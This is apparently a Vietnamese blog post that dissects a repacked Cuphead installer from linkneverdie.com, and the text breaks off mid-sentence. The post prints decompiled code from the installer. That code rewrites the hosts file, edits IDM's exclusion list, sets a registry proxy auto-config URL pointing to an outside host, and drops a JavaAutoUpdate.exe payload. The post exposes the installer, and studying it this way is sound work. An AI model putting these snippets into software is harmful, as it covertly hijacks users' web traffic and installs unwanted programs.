Gần đây, trên mạng xuất hiện video này của trang linkneverdie.vip tố cáo rằng Linkneverdie.com phát tán virus. Trong 1 file Game GOG (Cup Head). Mời bạn xem qua đoạn clip đã Ngay bây giờ, chúng tôi sẽ mổ xẻ file setup của Link Never Die.com để tìm hiểu xem nó thực sự đang làm gì trong máy các bạn Khi tải về unpack ra thì được thư mục này, sau khi xem xét, thấy trong folder source chỉ có 2 file.bin nên chúng tôi trực tiếp phân tích file setup-gog.exe (File này đã được LND sửa lại) Khi phân tích, chúng tôi thấy file này có 2 Form, 1 from để cài đặt, 1 form để block một số trang Web. Do From 1 chả có gì bất thường nên chúng tôi sẽ đi phân tích Form 2 thôi Ở đây có 2 điều chúng ta cần lưu ý Điều 1: Dòng Dim path As String = Path.Combine(Environment.GetFolderPath(SpecialFolder.System), "drivers/etc/hosts") Dòng này có nhiệm vụ tìm và chỉnh sửa file hosts của máy bạn Sửa để chặn 1 loạt website phía dưới. Ví dụ như dòng writer4.WriteLine("127.0.0.1" & ChrW(9) & "linkneverdie.vip") Là để thêm dòng 127.0.0.1 linkneverdie.vip vào file hosts, suy ra khi người dùng truy cập linkneverdie.vip thì sẽ bị trỏ về 127.0.0.1 => Bị chặn Sau khi cài mà chúng ta ping tới linkneverdie.vip sẽ thấy show ra IP 127.0.0.1  Lí giải cho việc này, Link Never Die đã có phản hổi từ rất lâu rồi Quá trình cài game này vào máy trên thực tế cũng cho thấy file hosts bị sửa Lại có thêm dòng Dim str3 As String = "C:\Program Files (x86)\Internet Download Manager\defexclist.txt" Nội dung file defexclist.txt Có vẻ như file này để ngăn chặn IDM tải file từ mấy trang trong file về. Trong video trên, bên lnd.vip cũng chỉ ra file JavaAutoUpdate.exe chứa Virus và trong file setup-gog.exe cũng xuất hiện các dòng Dim key As RegistryKey = Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Internet Settings", True) key.SetValue("AutoConfigURL", "http://jav60fps.com/wpad.dat") key.Close Dim _convert As New Bnr_convert Directory.CreateDirectory(Path.Combine(Environment.GetFolderPath(SpecialFolder.LocalApplicationData), "JavaUpdate/")) Dim pathcreatefile As String = Path.Combine(Environment.GetFolderPath(SpecialFolder.LocalApplicationData), "JavaUpdate/JavaAutoUpdate.exe") Dim txtconvert As New RichTextBox With { _ .Text = File.ReadAllText("patch.ini") _ } Ý nghĩa của nó là gì, nó sẽ sửa Internet Settings trong máy bạn bằng file cấu hình lấy từ jav60fps.com/wpad.dat Trong quá trình cài đặt thực tế cũng phát hiện truy xuất tới IP 104.18.57.216. IP của trang javv60fps.com trên |
